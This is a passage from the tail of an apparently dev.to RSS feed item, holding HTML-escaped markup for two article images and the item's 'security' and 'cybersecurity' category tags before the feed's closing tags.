&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjuc1zljat3xjepl4vfxw.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjuc1zljat3xjepl4vfxw.jpg" alt="Image description" width="607" height="517"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv7rqsoyhlc7rh7umy9ek.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv7rqsoyhlc7rh7umy9ek.jpg" alt="Image description" width="648" height="513"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
